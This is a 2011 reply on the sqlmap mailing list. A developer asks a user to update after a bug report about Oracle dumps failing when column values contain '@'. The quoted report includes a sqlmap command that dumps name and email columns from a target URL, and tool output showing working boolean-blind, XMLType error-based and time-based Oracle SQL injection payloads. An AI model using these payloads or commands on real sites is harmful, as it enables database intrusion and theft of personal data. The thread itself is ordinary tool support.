Re: [sqlmap-users] problem with oracle dump if column contents contain @
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] problem with oracle dump if column contents contain @
|
From: Miroslav S. <mir...@gm...> - 2011-07-23 06:02:26
|
hi 'Little Piggy'. could you please update and retry? kr On Sat, Jul 23, 2011 at 3:45 AM, This LittlePiggy <thi...@ho...> wrote: > When using sqlmap/1.0-dev (r4277) > ./sqlmap.py -v 4 -u > 'http://www.example.com/comunity/artickles_details.php?id=190' -D BELCH -T > FELATORS -C FNAME,EMAIL --dump > banner: 'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production' > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=190 AND 9035=9035 > Type: error-based > Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) > Payload: id=190 AND 4286=(SELECT > UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT > (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM > DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL) > Type: AND/OR time-based blind > Title: Oracle AND time-based blind > Payload: id=190 AND > 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5) > --- > [21:18:48] [INFO] the back-end DBMS is Oracle > web server operating system: Linux CentOS 5 > web application technology: Apache 2.2.3, PHP 5.3.5 > back-end DBMS: Oracle > > If any columns selected contain an @, the dump fails with > [21:42:10] [WARNING] possible server trimmed output detected (due to its > length): part-of-field-before-at-sign" (not a Name) > Error at line 1 > ORA-06512: at "SYS.XMLTYPE", line 310 > ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php > > suggestions? > > ------------------------------------------------------------------------------ > Storage Efficiency Calculator > This modeling tool is based on patent-pending intellectual property that > has been used successfully in hundreds of IBM storage optimization engage- > ments, worldwide. Store less, Store more with what you own, Move data to > the right place. Try It Now! > http://www.accelacomm.com/jaw/sfnl/114/51427378/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
